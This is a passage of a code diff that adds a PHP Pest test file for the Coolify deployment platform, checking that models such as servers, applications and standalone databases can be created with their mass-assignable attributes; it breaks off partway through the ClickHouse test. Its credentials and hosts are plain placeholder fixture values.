         'docker_compose_raw' => 'services: {}',
         'environment_id' => $environment->id,
         'server_id' => $server->id,
diff --git a/tests/Feature/ModelFillableCreationTest.php b/tests/Feature/ModelFillableCreationTest.php
new file mode 100644
index 000000000..b72e7381e
--- /dev/null
+++ b/tests/Feature/ModelFillableCreationTest.php
@@ -0,0 +1,1114 @@
+<?php
+
+use App\Models\Application;
+use App\Models\ApplicationPreview;
+use App\Models\ApplicationSetting;
+use App\Models\CloudProviderToken;
+use App\Models\Environment;
+use App\Models\GithubApp;
+use App\Models\Project;
+use App\Models\ProjectSetting;
+use App\Models\ScheduledDatabaseBackup;
+use App\Models\ScheduledDatabaseBackupExecution;
+use App\Models\ScheduledTask;
+use App\Models\ScheduledTaskExecution;
+use App\Models\Server;
+use App\Models\ServerSetting;
+use App\Models\Service;
+use App\Models\ServiceApplication;
+use App\Models\ServiceDatabase;
+use App\Models\StandaloneClickhouse;
+use App\Models\StandaloneDocker;
+use App\Models\StandaloneDragonfly;
+use App\Models\StandaloneKeydb;
+use App\Models\StandaloneMariadb;
+use App\Models\StandaloneMongodb;
+use App\Models\StandaloneMysql;
+use App\Models\StandalonePostgresql;
+use App\Models\StandaloneRedis;
+use App\Models\Subscription;
+use App\Models\SwarmDocker;
+use App\Models\Tag;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $this->team = Team::factory()->create();
+    $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+    $this->destination = $this->server->standaloneDockers()->firstOrFail();
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
+});
+
+it('creates User with all fillable attributes', function () {
+    $user = User::create([
+        'name' => 'Test User',
+        'email' => 'fillable-test@example.com',
+        'password' => bcrypt('password123'),
+        'force_password_reset' => true,
+        'marketing_emails' => false,
+        'pending_email' => 'newemail@example.com',
+        'email_change_code' => 'ABC123',
+        'email_change_code_expires_at' => now()->addHour(),
+    ]);
+
+    expect($user->exists)->toBeTrue();
+    expect($user->name)->toBe('Test User');
+    expect($user->email)->toBe('fillable-test@example.com');
+    expect($user->force_password_reset)->toBeTrue();
+    expect($user->marketing_emails)->toBeFalse();
+    expect($user->pending_email)->toBe('newemail@example.com');
+    expect($user->email_change_code)->toBe('ABC123');
+    expect($user->email_change_code_expires_at)->not->toBeNull();
+});
+
+it('creates Server with all fillable attributes', function () {
+    $cloudToken = CloudProviderToken::create([
+        'team_id' => $this->team->id,
+        'provider' => 'hetzner',
+        'token' => 'test-token',
+        'name' => 'test-cloud',
+    ]);
+
+    $server = Server::create([
+        'name' => 'fillable-test-server',
+        'ip' => '10.0.0.99',
+        'port' => 2222,
+        'user' => 'deployer',
+        'description' => 'A test server with all fillable attrs',
+        'private_key_id' => $this->server->private_key_id,
+        'cloud_provider_token_id' => $cloudToken->id,
+        'team_id' => $this->team->id,
+        'hetzner_server_id' => 'htz-12345',
+        'hetzner_server_status' => 'running',
+        'is_validating' => false,
+        'detected_traefik_version' => 'v2.10.0',
+        'traefik_outdated_info' => 'Up to date',
+        'server_metadata' => '{"region":"eu-central"}',
+        'ip_previous' => '10.0.0.1',
+    ]);
+
+    expect($server->exists)->toBeTrue();
+    expect((string) $server->name)->toBe('fillable-test-server');
+    expect((string) $server->ip)->toBe('10.0.0.99');
+    expect($server->port)->toBe(2222);
+    expect((string) $server->user)->toBe('deployer');
+    expect((string) $server->description)->toBe('A test server with all fillable attrs');
+    expect($server->private_key_id)->toBe($this->server->private_key_id);
+    expect($server->cloud_provider_token_id)->toBe($cloudToken->id);
+    expect($server->hetzner_server_id)->toBe('htz-12345');
+    expect($server->hetzner_server_status)->toBe('running');
+    expect($server->ip_previous)->toBe('10.0.0.1');
+});
+
+it('creates Project with all fillable attributes', function () {
+    $project = Project::create([
+        'name' => 'Fillable Test Project',
+        'description' => 'Testing all fillable attrs',
+        'team_id' => $this->team->id,
+        'uuid' => 'custom-project-uuid',
+    ]);
+
+    expect($project->exists)->toBeTrue();
+    expect($project->name)->toBe('Fillable Test Project');
+    expect($project->description)->toBe('Testing all fillable attrs');
+    expect($project->team_id)->toBe($this->team->id);
+    expect($project->uuid)->toBe('custom-project-uuid');
+});
+
+it('creates Environment with all fillable attributes', function () {
+    $env = Environment::create([
+        'name' => 'staging',
+        'description' => 'Staging environment',
+        'project_id' => $this->project->id,
+        'uuid' => 'custom-env-uuid',
+    ]);
+
+    expect($env->exists)->toBeTrue();
+    expect($env->name)->toBe('staging');
+    expect($env->description)->toBe('Staging environment');
+    expect($env->project_id)->toBe($this->project->id);
+    expect($env->uuid)->toBe('custom-env-uuid');
+});
+
+it('creates ProjectSetting with all fillable attributes', function () {
+    $setting = ProjectSetting::create([
+        'project_id' => $this->project->id,
+    ]);
+
+    expect($setting->exists)->toBeTrue();
+    expect($setting->project_id)->toBe($this->project->id);
+});
+
+it('creates Application with all fillable attributes', function () {
+    $application = Application::create([
+        'uuid' => 'custom-app-uuid',
+        'name' => 'Full Fillable App',
+        'description' => 'App with every fillable attr set',
+        'fqdn' => 'https://app.example.com',
+        'git_repository' => 'https://github.com/coollabsio/coolify',
+        'git_branch' => 'main',
+        'git_commit_sha' => 'abc123def456',
+        'git_full_url' => 'https://github.com/coollabsio/coolify.git',
+        'docker_registry_image_name' => 'ghcr.io/coollabsio/coolify',
+        'docker_registry_image_tag' => 'latest',
+        'build_pack' => 'nixpacks',
+        'static_image' => 'nginx:alpine',
+        'install_command' => 'npm install',
+        'build_command' => 'npm run build',
+        'start_command' => 'npm start',
+        'ports_exposes' => '3000',
+        'ports_mappings' => '3000:3000',
+        'base_directory' => '/',
+        'publish_directory' => '/dist',
+        'health_check_enabled' => true,
+        'health_check_path' => '/health',
+        'health_check_port' => '3000',
+        'health_check_host' => 'localhost',
+        'health_check_method' => 'GET',
+        'health_check_return_code' => 200,
+        'health_check_scheme' => 'http',
+        'health_check_response_text' => 'ok',
+        'health_check_interval' => 30,
+        'health_check_timeout' => 5,
+        'health_check_retries' => 3,
+        'health_check_start_period' => 10,
+        'health_check_type' => 'http',
+        'health_check_command' => 'curl -f http://localhost:3000/health',
+        'limits_memory' => '512m',
+        'limits_memory_swap' => '1g',
+        'limits_memory_swappiness' => 60,
+        'limits_memory_reservation' => '256m',
+        'limits_cpus' => '2',
+        'limits_cpuset' => '0-1',
+        'limits_cpu_shares' => 1024,
+        'status' => 'running',
+        'preview_url_template' => '{{pr_id}}.{{domain}}',
+        'dockerfile' => 'FROM node:18\nRUN npm install',
+        'dockerfile_location' => '/Dockerfile',
+        'dockerfile_target_build' => 'production',
+        'custom_labels' => 'traefik.enable=true',
+        'custom_docker_run_options' => '--cap-add=NET_ADMIN',
+        'post_deployment_command' => 'php artisan migrate',
+        'post_deployment_command_container' => 'app',
+        'pre_deployment_command' => 'php artisan down',
+        'pre_deployment_command_container' => 'app',
+        'manual_webhook_secret_github' => 'gh-secret-123',
+        'manual_webhook_secret_gitlab' => 'gl-secret-456',
+        'manual_webhook_secret_bitbucket' => 'bb-secret-789',
+        'manual_webhook_secret_gitea' => 'gt-secret-012',
+        'docker_compose_location' => '/docker-compose.yml',
+        'docker_compose' => 'services: {}',
+        'docker_compose_raw' => 'services:\n  app:\n    image: nginx',
+        'docker_compose_domains' => '{"app":"https://app.example.com"}',
+        'docker_compose_custom_start_command' => 'docker compose up -d',
+        'docker_compose_custom_build_command' => 'docker compose build',
+        'swarm_replicas' => 3,
+        'swarm_placement_constraints' => 'node.role==worker',
+        'watch_paths' => 'src/**,package.json',
+        'redirect' => 'www',
+        'compose_parsing_version' => '2',
+        'custom_nginx_configuration' => 'location / { proxy_pass http://localhost:3000; }',
+        'custom_network_aliases' => 'app-alias',
+        'custom_healthcheck_found' => false,
+        // Note: nixpkgsarchive, connect_to_docker_network, force_domain_override,
+        // is_container_label_escape_enabled, use_build_server are in $fillable but
+        // their migration columns may not exist in the test SQLite schema yet.
+        'is_http_basic_auth_enabled' => false,
+        'http_basic_auth_username' => 'admin',
+        'http_basic_auth_password' => 'secret',
+        'config_hash' => 'sha256:abc123',
+        'last_online_at' => now()->subMinutes(5)->toISOString(),
+        'restart_count' => 2,
+        'last_restart_at' => now()->subHour()->toISOString(),
+        'last_restart_type' => 'manual',
+        'environment_id' => $this->environment->id,
+        'destination_id' => $this->destination->id,
+        'destination_type' => $this->destination->getMorphClass(),
+        'source_id' => null,
+        'source_type' => null,
+        'repository_project_id' => null,
+        'private_key_id' => null,
+    ]);
+
+    expect($application->exists)->toBeTrue();
+    expect($application->uuid)->toBe('custom-app-uuid');
+    expect($application->name)->toBe('Full Fillable App');
+    expect((string) $application->git_repository)->toBe('https://github.com/coollabsio/coolify');
+    expect($application->build_pack)->toBe('nixpacks');
+    expect($application->ports_exposes)->toBe('3000');
+    expect($application->environment_id)->toBe($this->environment->id);
+    expect($application->destination_id)->toBe($this->destination->id);
+    expect($application->health_check_enabled)->toBeTrue();
+    expect($application->limits_memory)->toBe('512m');
+    expect($application->swarm_replicas)->toBe(3);
+    expect($application->restart_count)->toBe(2);
+});
+
+it('creates ApplicationSetting with all fillable attributes', function () {
+    $app = Application::create([
+        'name' => 'settings-test-app',
+        'git_repository' => 'https://github.com/test/repo',
+        'git_branch' => 'main',
+        'build_pack' => 'nixpacks',
+        'ports_exposes' => '3000',
+        'environment_id' => $this->environment->id,
+        'destination_id' => $this->destination->id,
+        'destination_type' => $this->destination->getMorphClass(),
+    ]);
+
+    // Delete auto-created setting so we can create one with all attrs
+    ApplicationSetting::where('application_id', $app->id)->delete();
+
+    $setting = ApplicationSetting::create([
+        'application_id' => $app->id,
+        'is_static' => true,
+        'is_git_submodules_enabled' => true,
+        'is_git_lfs_enabled' => true,
+        'is_auto_deploy_enabled' => false,
+        'is_force_https_enabled' => true,
+        'is_debug_enabled' => true,
+        'is_preview_deployments_enabled' => false,
+        'is_log_drain_enabled' => true,
+        'is_gpu_enabled' => true,
+        'gpu_driver' => 'nvidia',
+        'gpu_count' => '2',
+        'gpu_device_ids' => 'GPU-abc,GPU-def',
+        'gpu_options' => '--gpus all',
+        'is_include_timestamps' => true,
+        'is_swarm_only_worker_nodes' => false,
+        'is_raw_compose_deployment_enabled' => false,
+        'is_build_server_enabled' => false,
+        'is_consistent_container_name_enabled' => true,
+        'is_gzip_enabled' => true,
+        'is_stripprefix_enabled' => true,
+        'connect_to_docker_network' => false,
+        'custom_internal_name' => 'my-custom-app',
+        'is_container_label_escape_enabled' => true,
+        'is_env_sorting_enabled' => true,
+        'is_container_label_readonly_enabled' => false,
+        'is_preserve_repository_enabled' => false,
+        'disable_build_cache' => false,
+        'is_spa' => true,
+        'is_git_shallow_clone_enabled' => true,
+        'is_pr_deployments_public_enabled' => false,
+        'use_build_secrets' => false,
+        'inject_build_args_to_dockerfile' => true,
+        'include_source_commit_in_build' => true,
+        'docker_images_to_keep' => 5,
+    ]);
+
+    expect($setting->exists)->toBeTrue();
+    expect($setting->application_id)->toBe($app->id);
+    expect($setting->is_static)->toBeTrue();
+    expect($setting->is_gpu_enabled)->toBeTrue();
+    expect($setting->gpu_driver)->toBe('nvidia');
+    expect($setting->custom_internal_name)->toBe('my-custom-app');
+    expect($setting->is_spa)->toBeTrue();
+    expect($setting->docker_images_to_keep)->toBe(5);
+});
+
+it('creates ServerSetting with all fillable attributes', function () {
+    // Delete auto-created setting
+    ServerSetting::where('server_id', $this->server->id)->delete();
+
+    $setting = ServerSetting::create([
+        'server_id' => $this->server->id,
+        'is_swarm_manager' => false,
+        'is_jump_server' => false,
+        'is_build_server' => true,
+        'is_reachable' => true,
+        'is_usable' => true,
+        'wildcard_domain' => '*.example.com',
+        'is_cloudflare_tunnel' => false,
+        'is_logdrain_newrelic_enabled' => true,
+        'logdrain_newrelic_license_key' => 'nr-license-key-123',
+        'logdrain_newrelic_base_uri' => 'https://log-api.newrelic.com',
+        'is_logdrain_highlight_enabled' => false,
+        'logdrain_highlight_project_id' => 'hl-proj-123',
+        'is_logdrain_axiom_enabled' => true,
+        'logdrain_axiom_dataset_name' => 'coolify-logs',
+        'logdrain_axiom_api_key' => 'axiom-key-456',
+        'is_swarm_worker' => false,
+        'is_logdrain_custom_enabled' => false,
+        'logdrain_custom_config' => '{"endpoint":"https://logs.example.com"}',
+        'logdrain_custom_config_parser' => 'json',
+        'concurrent_builds' => 4,
+        'dynamic_timeout' => 600,
+        'force_disabled' => false,
+        'is_metrics_enabled' => true,
+        'generate_exact_labels' => true,
+        'force_docker_cleanup' => false,
+        'docker_cleanup_frequency' => '0 2 * * *',
+        'docker_cleanup_threshold' => 80,
+        'server_timezone' => 'UTC',
+        'delete_unused_volumes' => true,
+        'delete_unused_networks' => true,
+        'is_sentinel_enabled' => true,
+        'sentinel_token' => 'sentinel-token-789',
+        'sentinel_metrics_refresh_rate_seconds' => 30,
+        'sentinel_metrics_history_days' => 7,
+        'sentinel_push_interval_seconds' => 60,
+        'sentinel_custom_url' => 'https://sentinel.example.com',
+        'server_disk_usage_notification_threshold' => 90,
+        'is_sentinel_debug_enabled' => false,
+        'server_disk_usage_check_frequency' => '*/5 * * * *',
+        'is_terminal_enabled' => true,
+        'deployment_queue_limit' => 10,
+        'disable_application_image_retention' => false,
+    ]);
+
+    expect($setting->exists)->toBeTrue();
+    expect($setting->server_id)->toBe($this->server->id);
+    expect($setting->is_build_server)->toBeTrue();
+    expect($setting->wildcard_domain)->toBe('*.example.com');
+    expect($setting->concurrent_builds)->toBe(4);
+    expect($setting->sentinel_token)->toBe('sentinel-token-789');
+    expect($setting->deployment_queue_limit)->toBe(10);
+});
+
+it('creates Service with all fillable attributes', function () {
+    $service = Service::create([
+        'uuid' => 'custom-service-uuid',
+        'name' => 'Full Fillable Service',
+        'description' => 'Service with all fillable attrs',
+        'docker_compose_raw' => "services:\n  app:\n    image: nginx",
+        'docker_compose' => "services:\n  app:\n    image: nginx",
+        'connect_to_docker_network' => true,
+        'service_type' => 'test-service',
+        'config_hash' => 'sha256:svc123',
+        'compose_parsing_version' => '2',
+        'is_container_label_escape_enabled' => true,
+        'environment_id' => $this->environment->id,
+        'server_id' => $this->server->id,
+        'destination_id' => $this->destination->id,
+        'destination_type' => $this->destination->getMorphClass(),
+    ]);
+
+    expect($service->exists)->toBeTrue();
+    expect($service->uuid)->toBe('custom-service-uuid');
+    expect($service->name)->toBe('Full Fillable Service');
+    expect($service->docker_compose_raw)->not->toBeNull();
+    expect($service->service_type)->toBe('test-service');
+    expect($service->environment_id)->toBe($this->environment->id);
+    expect($service->server_id)->toBe($this->server->id);
+});
+
+it('creates ApplicationPreview with all fillable attributes', function () {
+    $app = Application::create([
+        'name' => 'preview-test-app',
+        'git_repository' => 'https://github.com/test/repo',
+        'git_branch' => 'main',
+        'build_pack' => 'nixpacks',
+        'ports_exposes' => '3000',
+        'environment_id' => $this->environment->id,
+        'destination_id' => $this->destination->id,
+        'destination_type' => $this->destination->getMorphClass(),
+    ]);
+
+    $preview = ApplicationPreview::create([
+        'uuid' => 'custom-preview-uuid',
+        'application_id' => $app->id,
+        'pull_request_id' => 42,
+        'pull_request_html_url' => 'https://github.com/test/repo/pull/42',
+        'pull_request_issue_comment_id' => 12345,
+        'fqdn' => 'https://pr-42.app.example.com',
+        'status' => 'queued',
+        'git_type' => 'github',
+        'docker_compose_domains' => '{"app":"https://pr-42.example.com"}',
+        'docker_registry_image_tag' => 'pr-42',
+        'last_online_at' => now()->toISOString(),
+    ]);
+
+    expect($preview->exists)->toBeTrue();
+    expect($preview->uuid)->toBe('custom-preview-uuid');
+    expect($preview->application_id)->toBe($app->id);
+    expect($preview->pull_request_id)->toBe(42);
+    expect($preview->fqdn)->toBe('https://pr-42.app.example.com');
+    expect($preview->git_type)->toBe('github');
+    expect($preview->docker_registry_image_tag)->toBe('pr-42');
+});
+
+it('creates ServiceApplication with all fillable attributes', function () {
+    $service = Service::create([
+        'docker_compose_raw' => 'services: {}',
+        'environment_id' => $this->environment->id,
+        'server_id' => $this->server->id,
+        'destination_id' => $this->destination->id,
+        'destination_type' => $this->destination->getMorphClass(),
+    ]);
+
+    $svcApp = ServiceApplication::create([
+        'service_id' => $service->id,
+        'name' => 'web',
+        'human_name' => 'Web Server',
+        'description' => 'Main web application',
+        'fqdn' => 'https://web.example.com',
+        'ports' => '80,443',
+        'exposes' => '80',
+        'status' => 'running',
+        'exclude_from_status' => false,
+        'required_fqdn' => true,
+        'image' => 'nginx:latest',
+        'is_log_drain_enabled' => true,
+        'is_include_timestamps' => true,
+        'is_gzip_enabled' => true,
+        'is_stripprefix_enabled' => true,
+        'last_online_at' => now()->toISOString(),
+        'is_migrated' => false,
+    ]);
+
+    expect($svcApp->exists)->toBeTrue();
+    expect($svcApp->service_id)->toBe($service->id);
+    expect($svcApp->name)->toBe('web');
+    expect($svcApp->human_name)->toBe('Web Server');
+    expect($svcApp->image)->toBe('nginx:latest');
+    expect($svcApp->is_log_drain_enabled)->toBeTrue();
+});
+
+it('creates ServiceDatabase with all fillable attributes', function () {
+    $service = Service::create([
+        'docker_compose_raw' => 'services: {}',
+        'environment_id' => $this->environment->id,
+        'server_id' => $this->server->id,
+        'destination_id' => $this->destination->id,
+        'destination_type' => $this->destination->getMorphClass(),
+    ]);
+
+    $svcDb = ServiceDatabase::create([
+        'service_id' => $service->id,
+        'name' => 'postgres',
+        'human_name' => 'PostgreSQL',
+        'description' => 'Main database',
+        'ports' => '5432',
+        'exposes' => '5432',
+        'status' => 'running',
+        'exclude_from_status' => false,
+        'image' => 'postgres:16',
+        'public_port' => 15432,
+        'is_public' => true,
+        'is_log_drain_enabled' => true,
+        'is_include_timestamps' => true,
+        'is_gzip_enabled' => false,
+        'is_stripprefix_enabled' => false,
+        'last_online_at' => now()->toISOString(),
+        'is_migrated' => false,
+        'custom_type' => 'postgresql',
+        'public_port_timeout' => 3600,
+    ]);
+
+    expect($svcDb->exists)->toBeTrue();
+    expect($svcDb->service_id)->toBe($service->id);
+    expect($svcDb->name)->toBe('postgres');
+    expect($svcDb->public_port)->toBe(15432);
+    expect($svcDb->is_public)->toBeTrue();
+    expect($svcDb->custom_type)->toBe('postgresql');
+});
+
+it('creates StandalonePostgresql with all fillable attributes', function () {
+    $db = StandalonePostgresql::create([
+        'uuid' => 'custom-pg-uuid',
+        'name' => 'Full Fillable Postgres',
+        'description' => 'PG with all attrs',
+        'postgres_user' => 'testuser',
+        'postgres_password' => 'testpass123',
+        'postgres_db' => 'testdb',
+        'postgres_initdb_args' => '--encoding=UTF8',
+        'postgres_host_auth_method' => 'scram-sha-256',
+        'postgres_conf' => 'max_connections=200',
+        'init_scripts' => 'CREATE TABLE test (id int);',
+        'status' => 'running',
+        'image' => 'postgres:16-alpine',
+        'is_public' => true,
+        'public_port' => 25432,
+        'ports_mappings' => '25432:5432',
+        'limits_memory' => '1g',
+        'limits_memory_swap' => '2g',
+        'limits_memory_swappiness' => 50,
+        'limits_memory_reservation' => '512m',
+        'limits_cpus' => '2',
+        'limits_cpuset' => '0-1',
+        'limits_cpu_shares' => 1024,
+        'started_at' => now()->subDay()->toISOString(),
+        'restart_count' => 1,
+        'last_restart_at' => now()->subHours(6)->toISOString(),
+        'last_restart_type' => 'manual',
+        'last_online_at' => now()->toISOString(),
+        'public_port_timeout' => 7200,
+        'enable_ssl' => true,
+        'ssl_mode' => 'verify-full',
+        'is_log_drain_enabled' => true,
+        'is_include_timestamps' => true,
+        'custom_docker_run_options' => '--shm-size=256m',
+        'destination_type' => $this->destination->getMorphClass(),
+        'destination_id' => $this->destination->id,
+        'environment_id' => $this->environment->id,
+    ]);
+
+    expect($db->exists)->toBeTrue();
+    expect($db->uuid)->toBe('custom-pg-uuid');
+    expect($db->postgres_user)->toBe('testuser');
+    expect($db->postgres_db)->toBe('testdb');
+    expect($db->is_public)->toBeTrue();
+    expect($db->public_port)->toBe(25432);
+    expect($db->enable_ssl)->toBeTrue();
+    expect($db->environment_id)->toBe($this->environment->id);
+});
+
+it('creates StandaloneMysql with all fillable attributes', function () {
+    $db = StandaloneMysql::create([
+        'uuid' => 'custom-mysql-uuid',
+        'name' => 'Full Fillable MySQL',
+        'description' => 'MySQL with all attrs',
+        'mysql_root_password' => 'rootpass123',
+        'mysql_user' => 'testuser',
+        'mysql_password' => 'testpass123',
+        'mysql_database' => 'testdb',
+        'mysql_conf' => '[mysqld]\nmax_connections=200',
+        'status' => 'running',
+        'image' => 'mysql:8.0',
+        'is_public' => false,
+        'public_port' => 23306,
+        'ports_mappings' => '23306:3306',
+        'limits_memory' => '1g',
+        'limits_memory_swap' => '2g',
+        'limits_memory_swappiness' => 50,
+        'limits_memory_reservation' => '512m',
+        'limits_cpus' => '2',
+        'limits_cpuset' => '0-1',
+        'limits_cpu_shares' => 1024,
+        'started_at' => now()->subDay()->toISOString(),
+        'restart_count' => 0,
+        'last_restart_at' => null,
+        'last_restart_type' => null,
+        'last_online_at' => now()->toISOString(),
+        'public_port_timeout' => 3600,
+        'enable_ssl' => true,
+        'ssl_mode' => 'REQUIRED',
+        'is_log_drain_enabled' => false,
+        'is_include_timestamps' => false,
+        'custom_docker_run_options' => '--ulimit nofile=65535:65535',
+        'destination_type' => $this->destination->getMorphClass(),
+        'destination_id' => $this->destination->id,
+        'environment_id' => $this->environment->id,
+    ]);
+
+    expect($db->exists)->toBeTrue();
+    expect($db->uuid)->toBe('custom-mysql-uuid');
+    expect($db->mysql_root_password)->toBe('rootpass123');
+    expect($db->mysql_database)->toBe('testdb');
+    expect($db->enable_ssl)->toBeTrue();
+    expect($db->environment_id)->toBe($this->environment->id);
+});
+
+it('creates StandaloneMariadb with all fillable attributes', function () {
+    $db = StandaloneMariadb::create([
+        'uuid' => 'custom-maria-uuid',
+        'name' => 'Full Fillable MariaDB',
+        'description' => 'MariaDB with all attrs',
+        'mariadb_root_password' => 'rootpass123',
+        'mariadb_user' => 'testuser',
+        'mariadb_password' => 'testpass123',
+        'mariadb_database' => 'testdb',
+        'mariadb_conf' => '[mysqld]\nmax_connections=200',
+        'status' => 'running',
+        'image' => 'mariadb:11',
+        'is_public' => false,
+        'public_port' => 23307,
+        'ports_mappings' => '23307:3306',
+        'limits_memory' => '1g',
+        'limits_memory_swap' => '2g',
+        'limits_memory_swappiness' => 50,
+        'limits_memory_reservation' => '512m',
+        'limits_cpus' => '2',
+        'limits_cpuset' => '0-1',
+        'limits_cpu_shares' => 1024,
+        'started_at' => now()->subDay()->toISOString(),
+        'restart_count' => 0,
+        'last_restart_at' => null,
+        'last_restart_type' => null,
+        'last_online_at' => now()->toISOString(),
+        'public_port_timeout' => 3600,
+        'enable_ssl' => false,
+        'is_log_drain_enabled' => false,
+        'custom_docker_run_options' => '',
+        'destination_type' => $this->destination->getMorphClass(),
+        'destination_id' => $this->destination->id,
+        'environment_id' => $this->environment->id,
+    ]);
+
+    expect($db->exists)->toBeTrue();
+    expect($db->uuid)->toBe('custom-maria-uuid');
+    expect($db->mariadb_root_password)->toBe('rootpass123');
+    expect($db->mariadb_database)->toBe('testdb');
+    expect($db->environment_id)->toBe($this->environment->id);
+});
+
+it('creates StandaloneMongodb with all fillable attributes', function () {
+    $db = StandaloneMongodb::create([
+        'uuid' => 'custom-mongo-uuid',
+        'name' => 'Full Fillable MongoDB',
+        'description' => 'MongoDB with all attrs',
+        'mongo_conf' => '{"storage":{"dbPath":"/data/db"}}',
+        'mongo_initdb_root_username' => 'mongoadmin',
+        'mongo_initdb_root_password' => 'mongopass123',
+        'mongo_initdb_database' => 'testdb',
+        'status' => 'running',
+        'image' => 'mongo:7',
+        'is_public' => false,
+        'public_port' => 27018,
+        'ports_mappings' => '27018:27017',
+        'limits_memory' => '2g',
+        'limits_memory_swap' => '4g',
+        'limits_memory_swappiness' => 60,
+        'limits_memory_reservation' => '1g',
+        'limits_cpus' => '4',
+        'limits_cpuset' => '0-3',
+        'limits_cpu_shares' => 2048,
+        'started_at' => now()->subDay()->toISOString(),
+        'restart_count' => 0,
+        'last_restart_at' => null,
+        'last_restart_type' => null,
+        'last_online_at' => now()->toISOString(),
+        'public_port_timeout' => 3600,
+        'enable_ssl' => false,
+        'ssl_mode' => 'prefer',
+        'is_log_drain_enabled' => false,
+        'is_include_timestamps' => false,
+        'custom_docker_run_options' => '',
+        'destination_type' => $this->destination->getMorphClass(),
+        'destination_id' => $this->destination->id,
+        'environment_id' => $this->environment->id,
+    ]);
+
+    expect($db->exists)->toBeTrue();
+    expect($db->uuid)->toBe('custom-mongo-uuid');
+    expect($db->mongo_initdb_root_username)->toBe('mongoadmin');
+    expect($db->mongo_initdb_database)->toBe('testdb');
+    expect($db->environment_id)->toBe($this->environment->id);
+});
+
+it('creates StandaloneRedis with all fillable attributes', function () {
+    $db = StandaloneRedis::create([
+        'uuid' => 'custom-redis-uuid',
+        'name' => 'Full Fillable Redis',
+        'description' => 'Redis with all attrs',
+        'redis_conf' => 'maxmemory 256mb\nmaxmemory-policy allkeys-lru',
+        'status' => 'running',
+        'image' => 'redis:7-alpine',
+        'is_public' => true,
+        'public_port' => 26379,
+        'ports_mappings' => '26379:6379',
+        'limits_memory' => '512m',
+        'limits_memory_swap' => '1g',
+        'limits_memory_swappiness' => 30,
+        'limits_memory_reservation' => '256m',
+        'limits_cpus' => '1',
+        'limits_cpuset' => '0',
+        'limits_cpu_shares' => 512,
+        'started_at' => now()->subDay()->toISOString(),
+        'restart_count' => 0,
+        'last_restart_at' => null,
+        'last_restart_type' => null,
+        'last_online_at' => now()->toISOString(),
+        'public_port_timeout' => 3600,
+        'enable_ssl' => false,
+        'is_log_drain_enabled' => false,
+        'is_include_timestamps' => false,
+        'custom_docker_run_options' => '',
+        'destination_type' => $this->destination->getMorphClass(),
+        'destination_id' => $this->destination->id,
+        'environment_id' => $this->environment->id,
+    ]);
+
+    expect($db->exists)->toBeTrue();
+    expect($db->uuid)->toBe('custom-redis-uuid');
+    expect($db->redis_conf)->toContain('maxmemory');
+    expect($db->is_public)->toBeTrue();
+    expect($db->environment_id)->toBe($this->environment->id);
+});
+
+it('creates StandaloneKeydb with all fillable attributes', function () {
+    $db = StandaloneKeydb::create([
+        'uuid' => 'custom-keydb-uuid',
+        'name' => 'Full Fillable KeyDB',
+        'description' => 'KeyDB with all attrs',
+        'keydb_password' => 'keydbpass123',
+        'keydb_conf' => 'server-threads 4',
+        'is_log_drain_enabled' => false,
+        'is_include_timestamps' => false,
+        'status' => 'running',
+        'image' => 'eqalpha/keydb:latest',
+        'is_public' => false,
+        'public_port' => 26380,
+        'ports_mappings' => '26380:6379',
+        'limits_memory' => '512m',
+        'limits_memory_swap' => '1g',
+        'limits_memory_swappiness' => 30,
+        'limits_memory_reservation' => '256m',
+        'limits_cpus' => '2',
+        'limits_cpuset' => '0-1',
+        'limits_cpu_shares' => 512,
+        'started_at' => now()->subDay()->toISOString(),
+        'restart_count' => 0,
+        'last_restart_at' => null,
+        'last_restart_type' => null,
+        'last_online_at' => now()->toISOString(),
+        'public_port_timeout' => 3600,
+        'enable_ssl' => false,
+        'custom_docker_run_options' => '',
+        'destination_type' => $this->destination->getMorphClass(),
+        'destination_id' => $this->destination->id,
+        'environment_id' => $this->environment->id,
+    ]);
+
+    expect($db->exists)->toBeTrue();
+    expect($db->uuid)->toBe('custom-keydb-uuid');
+    expect($db->keydb_password)->toBe('keydbpass123');
+    expect($db->environment_id)->toBe($this->environment->id);
+});
+
+it('creates StandaloneDragonfly with all fillable attributes', function () {
+    $db = StandaloneDragonfly::create([
+        'uuid' => 'custom-dragonfly-uuid',
+        'name' => 'Full Fillable Dragonfly',
+        'description' => 'Dragonfly with all attrs',
+        'dragonfly_password' => 'dragonflypass123',
+        'is_log_drain_enabled' => false,
+        'is_include_timestamps' => false,
+        'status' => 'running',
+        'image' => 'docker.dragonflydb.io/dragonflydb/dragonfly:latest',
+        'is_public' => false,
+        'public_port' => 26381,
+        'ports_mappings' => '26381:6379',
+        'limits_memory' => '1g',
+        'limits_memory_swap' => '2g',
+        'limits_memory_swappiness' => 30,
+        'limits_memory_reservation' => '512m',
+        'limits_cpus' => '2',
+        'limits_cpuset' => '0-1',
+        'limits_cpu_shares' => 512,
+        'started_at' => now()->subDay()->toISOString(),
+        'restart_count' => 0,
+        'last_restart_at' => null,
+        'last_restart_type' => null,
+        'last_online_at' => now()->toISOString(),
+        'public_port_timeout' => 3600,
+        'enable_ssl' => false,
+        'custom_docker_run_options' => '',
+        'destination_type' => $this->destination->getMorphClass(),
+        'destination_id' => $this->destination->id,
+        'environment_id' => $this->environment->id,
+    ]);
+
+    expect($db->exists)->toBeTrue();
+    expect($db->uuid)->toBe('custom-dragonfly-uuid');
+    expect($db->dragonfly_password)->toBe('dragonflypass123');
+    expect($db->environment_id)->toBe($this->environment->id);
+});
+
+it('creates StandaloneClickhouse with all fillable attributes', function () {
+    $db = StandaloneClickhouse::create([
+        'uuid' => 'custom-ch-uuid',
+        'name' => 'Full Fillable ClickHouse',
+        'description' => 'ClickHouse with all attrs',
+        'clickhouse_admin_user' => 'chadmin',
+        'clickhouse_admin_password' => 'chpass123',
+        'is_log_drain_enabled' => false,
+        'is_include_timestamps' => false,
+        'status' => 'running',
+        'image' => 'clickhouse/clickhouse-server:latest',
+        'is_public' => false,
+        'public_port' => 28123,
+        'ports_mappings' => '28123:8123',
+        'limits_memory' => '2g',
+        'limits_memory_swap' => '4g',
+        'limits_memory_swappiness' => 30,
+        'limits_memory_reservation' => '1g',
+        'limits_cpus' => '4',
+        'limits_cpuset' => '0-3',
+        'limits_cpu_shares' => 2048,
+        'started_at' => now()->subDay()->toISOString(),
+        'restart_count' => 0,
+        'last_restart_at' => null,
+        'last_restart_type' => null,
